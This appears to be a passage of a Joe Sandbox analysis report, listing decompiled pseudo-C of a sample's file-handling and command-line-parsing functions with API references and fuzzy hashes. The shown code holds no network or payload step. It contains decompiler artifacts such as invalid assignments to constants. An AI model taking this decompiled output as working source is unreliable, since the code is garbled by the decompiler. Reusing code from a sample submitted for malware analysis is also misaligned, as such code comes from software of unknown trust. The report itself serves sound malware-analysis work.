                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                        				} else {
                                                                        					if((__edx & 0x00000400) == 0) {
                                                                        						asm("sbb esi, esi");
                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                        					} else {
                                                                        						_t23 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                        					return _t7;
                                                                        				} else {
                                                                        					E00F8490C(_t11);
                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                        				}
                                                                        			}








                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00F84A23,?,00F84F67,*MEMCAB,00008000,00000180), ref: 00F848DE
                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00F84F67,*MEMCAB,00008000,00000180), ref: 00F84902
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: e395279ecb79f1d68940f25edc77cb73ac7cd409f17a0b2355c01bcbe6eef66d
                                                                        • Instruction ID: 75ed903f5eb3362a487a4d0e5458f13746432ed4c5b363cfd67eb3b2fbf019e4
                                                                        • Opcode Fuzzy Hash: e395279ecb79f1d68940f25edc77cb73ac7cd409f17a0b2355c01bcbe6eef66d
                                                                        • Instruction Fuzzy Hash: 6C014BA3E1257526F724A0294C88FF7555CCB96734F1B0335FDAAE71D1D664AC04A3E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F84AD0(signed int _a4, void* _a8, long _a12) {
                                                                        				signed int _t9;
                                                                        				int _t12;
                                                                        				signed int _t14;
                                                                        				signed int _t15;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				signed int _t24;
                                                                        				signed int _t25;
                                                                        
                                                                        				_t20 =  *0xf8858c; // 0x268
                                                                        				_t9 = E00F83680(_t20);
                                                                        				if( *0xf891d8 == 0) {
                                                                        					_push(_t24);
                                                                        					_t12 = WriteFile( *(0xf88d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                        					if(_t12 != 0) {
                                                                        						_t25 = _a12;
                                                                        						if(_t25 != 0xffffffff) {
                                                                        							_t14 =  *0xf89400; // 0x5d800
                                                                        							_t15 = _t14 + _t25;
                                                                        							 *0xf89400 = _t15;
                                                                        							if( *0xf88184 != 0) {
                                                                        								_t21 =  *0xf88584; // 0x0
                                                                        								if(_t21 != 0) {
                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xf893f8, 0);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t25 = _t24 | 0xffffffff;
                                                                        					}
                                                                        					return _t25;
                                                                        				} else {
                                                                        					return _t9 | 0xffffffff;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                          • Part of subcall function 00F83680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F8369F
                                                                          • Part of subcall function 00F83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836B2
                                                                          • Part of subcall function 00F83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836DA
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F84B05
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                        • String ID:
                                                                        • API String ID: 1084409-0
                                                                        • Opcode ID: 7753826566daa48207e258a031364ebc963c61091691f191a32ea56db4471ee4
                                                                        • Instruction ID: 0189e0df423eecc880a8cf2ceb0677014a3b07264e24c7e85c593ac3b8b22216
                                                                        • Opcode Fuzzy Hash: 7753826566daa48207e258a031364ebc963c61091691f191a32ea56db4471ee4
                                                                        • Instruction Fuzzy Hash: 1D018C3164020AABDB14AF68DC05BF27759FB84735F098225F9399B1E1CB70E812EB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F8658A(char* __ecx, void* __edx, char* _a4) {
                                                                        				intOrPtr _t4;
                                                                        				char* _t6;
                                                                        				char* _t8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        
                                                                        				_t16 = __ecx;
                                                                        				_t10 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_t1 = _t17 + 1; // 0xf88b3f
                                                                        				_t12 = _t1;
                                                                        				do {
                                                                        					_t4 =  *_t17;
                                                                        					_t17 = _t17 + 1;
                                                                        				} while (_t4 != 0);
                                                                        				_t18 = _t17 - _t12;
                                                                        				_t2 = _t18 + 1; // 0xf88b40
                                                                        				if(_t2 < __edx) {
                                                                        					_t19 = _t18 + __ecx;
                                                                        					if(_t19 > __ecx) {
                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                        						if( *_t8 != 0x5c) {
                                                                        							 *_t19 = 0x5c;
                                                                        							_t19 =  &(_t19[1]);
                                                                        						}
                                                                        					}
                                                                        					_t6 = _a4;
                                                                        					 *_t19 = 0;
                                                                        					while( *_t6 == 0x20) {
                                                                        						_t6 = _t6 + 1;
                                                                        					}
                                                                        					return E00F816B3(_t16, _t10, _t6);
                                                                        				}
                                                                        				return 0x8007007a;
                                                                        			}












                                                                        APIs
                                                                        • CharPrevA.USER32(00F88B3E,00F88B3F,00000001,00F88B3E,-00000003,?,00F860EC,00F81140,?), ref: 00F865BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrev
                                                                        • String ID:
                                                                        • API String ID: 122130370-0
                                                                        • Opcode ID: 557e86bcc19b9ae9e63ee8eb139104066e5359afce97b1bab91ecca7fedbbf3e
                                                                        • Instruction ID: c6337546023b03c89c79c784f38b635b51d11465c4c9719c5a25ade792e98a6b
                                                                        • Opcode Fuzzy Hash: 557e86bcc19b9ae9e63ee8eb139104066e5359afce97b1bab91ecca7fedbbf3e
                                                                        • Instruction Fuzzy Hash: F1F04C335042509BD331291D9884BF6BFDEDB86360F2C016EF8DACB205DA658C46A3A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F8621E() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t5;
                                                                        				void* _t9;
                                                                        				void* _t13;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t5 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t5 ^ _t21;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					0x4f0 = 2;
                                                                        					_t9 = E00F8597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                        				} else {
                                                                        					E00F844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                        					 *0xf89124 = E00F86285();
                                                                        					_t9 = 0;
                                                                        				}
                                                                        				return E00F86CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                        			}











                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F8623F
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                        • String ID:
                                                                        • API String ID: 381621628-0
                                                                        • Opcode ID: b2a0d24026078d680fa0ee4823844cca5749e6aee68ee81940a9dc265bc58817
                                                                        • Instruction ID: 48bf8b38bb1ee1e9294c63d40cfbfc9435cea2e0aa12b4b58f00933a0f441f48
                                                                        • Opcode Fuzzy Hash: b2a0d24026078d680fa0ee4823844cca5749e6aee68ee81940a9dc265bc58817
                                                                        • Instruction Fuzzy Hash: 1EF082B1744208ABEB50FF749D06FFE77ACDB54700F4004AAB986DA191ED789D44A750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F84B60(signed int _a4) {
                                                                        				signed int _t9;
                                                                        				signed int _t15;
                                                                        
                                                                        				_t15 = _a4 * 0x18;
                                                                        				if( *((intOrPtr*)(_t15 + 0xf88d64)) != 1) {
                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xf88d74)); // executed
                                                                        					if(_t9 == 0) {
                                                                        						return _t9 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t15 + 0xf88d60)) = 1;
                                                                        					return 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t15 + 0xf88d60)) = 1;
                                                                        				 *((intOrPtr*)(_t15 + 0xf88d68)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xf88d70)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xf88d6c)) = 0;
                                                                        				return 0;
                                                                        			}





                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00F84FA1,00000000), ref: 00F84B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: d1cfb9609e057179b18baa7727f77f7144c6e45b0416605691bb80c0c994a52e
                                                                        • Instruction ID: 65394b9ebd2cb5263d3f6b7a779efc780a38a34a9a7aca0aebe99d9ce0dcf97a
                                                                        • Opcode Fuzzy Hash: d1cfb9609e057179b18baa7727f77f7144c6e45b0416605691bb80c0c994a52e
                                                                        • Instruction Fuzzy Hash: E6F01932D40B099E8772DF79CC016D2BBE4EAD53E0350092EA46ED2191EB30A542FBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F866AE(CHAR* __ecx) {
                                                                        				unsigned int _t1;
                                                                        
                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                        				if(_t1 != 0xffffffff) {
                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}




                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,00F84777,?,00F84E38,?), ref: 00F866B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 4a882d498f73a73c30f3b3f7841c692236e43da224ee1421fee2580fde95b9fa
                                                                        • Instruction ID: f8394646367cd87c14a98acb2c54106737f66a7db714fdeb3e836cd0e731b044
                                                                        • Opcode Fuzzy Hash: 4a882d498f73a73c30f3b3f7841c692236e43da224ee1421fee2580fde95b9fa
                                                                        • Instruction Fuzzy Hash: C7B09276622484426A2016316C295A63841F6C123A7E41B91F032C01E0DA3EC846E204
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F84CA0(long _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        APIs
                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00F84CAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: AllocGlobal
                                                                        • String ID:
                                                                        • API String ID: 3761449716-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F84CC0(void* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00f84cc8
                                                                        0x00f84ccf

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00F85C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v265;
                                                                        				char _v266;
                                                                        				char _v267;
                                                                        				char _v268;
                                                                        				CHAR* _v272;
                                                                        				char _v276;
                                                                        				signed int _v296;
                                                                        				char _v556;
                                                                        				signed int _t61;
                                                                        				int _t63;
                                                                        				char _t67;
                                                                        				CHAR* _t69;
                                                                        				signed int _t71;
                                                                        				void* _t75;
                                                                        				char _t79;
                                                                        				void* _t83;
                                                                        				void* _t85;
                                                                        				void* _t87;
                                                                        				intOrPtr _t88;
                                                                        				void* _t100;
                                                                        				intOrPtr _t101;
                                                                        				CHAR* _t104;
                                                                        				intOrPtr _t105;
                                                                        				void* _t111;
                                                                        				void* _t115;
                                                                        				CHAR* _t118;
                                                                        				void* _t119;
                                                                        				void* _t127;
                                                                        				CHAR* _t129;
                                                                        				void* _t132;
                                                                        				void* _t142;
                                                                        				signed int _t143;
                                                                        				CHAR* _t144;
                                                                        				void* _t145;
                                                                        				void* _t146;
                                                                        				void* _t147;
                                                                        				void* _t149;
                                                                        				char _t155;
                                                                        				void* _t157;
                                                                        				void* _t162;
                                                                        				void* _t163;
                                                                        				char _t167;
                                                                        				char _t170;
                                                                        				CHAR* _t173;
                                                                        				void* _t177;
                                                                        				intOrPtr* _t183;
                                                                        				intOrPtr* _t192;
                                                                        				CHAR* _t199;
                                                                        				void* _t200;
                                                                        				CHAR* _t201;
                                                                        				void* _t205;
                                                                        				void* _t206;
                                                                        				int _t209;
                                                                        				void* _t210;
                                                                        				void* _t212;
                                                                        				void* _t213;
                                                                        				CHAR* _t218;
                                                                        				intOrPtr* _t219;
                                                                        				intOrPtr* _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t223;
                                                                        
                                                                        				_t173 = __ecx;
                                                                        				_t61 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t61 ^ _t221;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t209 = 1;
                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                        					_t63 = 1;
                                                                        				} else {
                                                                        					L2:
                                                                        					while(_t209 != 0) {
                                                                        						_t67 =  *_t173;
                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                        							_t173 = CharNextA(_t173);
                                                                        							continue;
                                                                        						}
                                                                        						_v272 = _t173;
                                                                        						if(_t67 == 0) {
                                                                        							break;
                                                                        						} else {
                                                                        							_t69 = _v272;
                                                                        							_t177 = 0;
                                                                        							_t213 = 0;
                                                                        							_t163 = 0;
                                                                        							_t202 = 1;
                                                                        							do {
                                                                        								if(_t213 != 0) {
                                                                        									if(_t163 != 0) {
                                                                        										break;
                                                                        									} else {
                                                                        										goto L21;
                                                                        									}
                                                                        								} else {
                                                                        									_t69 =  *_t69;
                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t69 = _v272;
                                                                        										L21:
                                                                        										_t155 =  *_t69;
                                                                        										if(_t155 != 0x22) {
                                                                        											if(_t202 >= 0x104) {
                                                                        												goto L106;
                                                                        											} else {
                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                        												_t177 = _t177 + 1;
                                                                        												_t202 = _t202 + 1;
                                                                        												_t157 = 1;
                                                                        												goto L30;
                                                                        											}
                                                                        										} else {
                                                                        											if(_v272[1] == 0x22) {
                                                                        												if(_t202 >= 0x104) {
                                                                        													L106:
                                                                        													_t63 = 0;
                                                                        													L125:
                                                                        													_pop(_t210);
                                                                        													_pop(_t212);
                                                                        													_pop(_t162);
                                                                        													return E00F86CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                        												} else {
                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                        													_t177 = _t177 + 1;
                                                                        													_t202 = _t202 + 1;
                                                                        													_t157 = 2;
                                                                        													goto L30;
                                                                        												}
                                                                        											} else {
                                                                        												_t157 = 1;
                                                                        												if(_t213 != 0) {
                                                                        													_t163 = 1;
                                                                        												} else {
                                                                        													_t213 = 1;
                                                                        												}
                                                                        												goto L30;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L131;
                                                                        								L30:
                                                                        								_v272 =  &(_v272[_t157]);
                                                                        								_t69 = _v272;
                                                                        							} while ( *_t69 != 0);
                                                                        							if(_t177 >= 0x104) {
                                                                        								E00F86E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                        								asm("int3");
                                                                        								_push(_t221);
                                                                        								_t222 = _t223;
                                                                        								_t71 =  *0xf88004; // 0x7e92e7a6
                                                                        								_v296 = _t71 ^ _t223;
                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                        									0x4f0 = 2;
                                                                        									_t75 = E00F8597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                        								} else {
                                                                        									E00F844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                        									 *0xf89124 = E00F86285();
                                                                        									_t75 = 0;
                                                                        								}
                                                                        								return E00F86CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                        							} else {
                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                        								if(_t213 == 0) {
                                                                        									if(_t163 != 0) {
                                                                        										goto L34;
                                                                        									} else {
                                                                        										goto L40;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t163 != 0) {
                                                                        										L40:
                                                                        										_t79 = _v268;
                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                        											if(_t83 == 0) {
                                                                        												_t202 = 0x521;
                                                                        												E00F844B9(0, 0x521, 0xf81140, 0, 0x40, 0);
                                                                        												_t85 =  *0xf88588; // 0x0
                                                                        												if(_t85 != 0) {
                                                                        													CloseHandle(_t85);
                                                                        												}
                                                                        												ExitProcess(0);
                                                                        											}
                                                                        											_t87 = _t83 - 4;
                                                                        											if(_t87 == 0) {
                                                                        												if(_v266 != 0) {
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t215 =  &_v268 + _t167;
                                                                        														_t183 =  &_v268 + _t167;
                                                                        														_t50 = _t183 + 1; // 0x1
                                                                        														_t202 = _t50;
                                                                        														do {
                                                                        															_t88 =  *_t183;
                                                                        															_t183 = _t183 + 1;
                                                                        														} while (_t88 != 0);
                                                                        														if(_t183 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t205 = 0x5b;
                                                                        															if(E00F8667F(_t215, _t205) == 0) {
                                                                        																L115:
                                                                        																_t206 = 0x5d;
                                                                        																if(E00F8667F(_t215, _t206) == 0) {
                                                                        																	L117:
                                                                        																	_t202 =  &_v276;
                                                                        																	_v276 = _t167;
                                                                        																	if(E00F85C17(_t215,  &_v276) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		_t202 = 0x104;
                                                                        																		E00F81680(0xf88c42, 0x104, _v276 + _t167 +  &_v268);
                                                                        																	}
                                                                        																} else {
                                                                        																	_t202 = 0x5b;
                                                                        																	if(E00F8667F(_t215, _t202) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		goto L117;
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																_t202 = 0x5d;
                                                                        																if(E00F8667F(_t215, _t202) == 0) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	goto L115;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													 *0xf88a24 = 1;
                                                                        												}
                                                                        												goto L50;
                                                                        											} else {
                                                                        												_t100 = _t87 - 1;
                                                                        												if(_t100 == 0) {
                                                                        													L98:
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t217 =  &_v268 + _t170;
                                                                        														_t192 =  &_v268 + _t170;
                                                                        														_t38 = _t192 + 1; // 0x1
                                                                        														_t202 = _t38;
                                                                        														do {
                                                                        															_t101 =  *_t192;
                                                                        															_t192 = _t192 + 1;
                                                                        														} while (_t101 != 0);
                                                                        														if(_t192 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t202 =  &_v276;
                                                                        															_v276 = _t170;
                                                                        															if(E00F85C17(_t217,  &_v276) == 0) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t104 = CharUpperA(_v267);
                                                                        																_t218 = 0xf88b3e;
                                                                        																_t105 = _v276;
                                                                        																if(_t104 != 0x54) {
                                                                        																	_t218 = 0xf88a3a;
                                                                        																}
                                                                        																E00F81680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                        																_t202 = 0x104;
                                                                        																E00F8658A(_t218, 0x104, 0xf81140);
                                                                        																if(E00F831E0(_t218) != 0) {
                                                                        																	goto L50;
                                                                        																} else {
                                                                        																	goto L106;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t111 = _t100 - 0xa;
                                                                        													if(_t111 == 0) {
                                                                        														if(_v266 != 0) {
                                                                        															if(_v266 != 0x3a) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t199 = _v265;
                                                                        																if(_t199 != 0) {
                                                                        																	_t219 =  &_v265;
                                                                        																	do {
                                                                        																		_t219 = _t219 + 1;
                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                        																		if(_t115 == 0) {
                                                                        																			 *0xf88a2c = 1;
                                                                        																		} else {
                                                                        																			_t200 = 2;
                                                                        																			_t119 = _t115 - _t200;
                                                                        																			if(_t119 == 0) {
                                                                        																				 *0xf88a30 = 1;
                                                                        																			} else {
                                                                        																				if(_t119 == 0xf) {
                                                                        																					 *0xf88a34 = 1;
                                                                        																				} else {
                                                                        																					_t209 = 0;
                                                                        																				}
                                                                        																			}
                                                                        																		}
                                                                        																		_t118 =  *_t219;
                                                                        																		_t199 = _t118;
                                                                        																	} while (_t118 != 0);
                                                                        																}
                                                                        															}
                                                                        														} else {
                                                                        															 *0xf88a2c = 1;
                                                                        														}
                                                                        														goto L50;
                                                                        													} else {
                                                                        														_t127 = _t111 - 3;
                                                                        														if(_t127 == 0) {
                                                                        															if(_v266 != 0) {
                                                                        																if(_v266 != 0x3a) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	_t129 = CharUpperA(_v265);
                                                                        																	if(_t129 == 0x31) {
                                                                        																		goto L76;
                                                                        																	} else {
                                                                        																		if(_t129 == 0x41) {
                                                                        																			goto L83;
                                                                        																		} else {
                                                                        																			if(_t129 == 0x55) {
                                                                        																				goto L76;
                                                                        																			} else {
                                                                        																				goto L49;
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																L76:
                                                                        																_push(2);
                                                                        																_pop(1);
                                                                        																L83:
                                                                        																 *0xf88a38 = 1;
                                                                        															}
                                                                        															goto L50;
                                                                        														} else {
                                                                        															_t132 = _t127 - 1;
                                                                        															if(_t132 == 0) {
                                                                        																if(_v266 != 0) {
                                                                        																	if(_v266 != 0x3a) {
                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                        																			goto L49;
                                                                        																		}
                                                                        																	} else {
                                                                        																		_t201 = _v265;
                                                                        																		 *0xf89a2c = 1;
                                                                        																		if(_t201 != 0) {
                                                                        																			_t220 =  &_v265;
                                                                        																			do {
                                                                        																				_t220 = _t220 + 1;
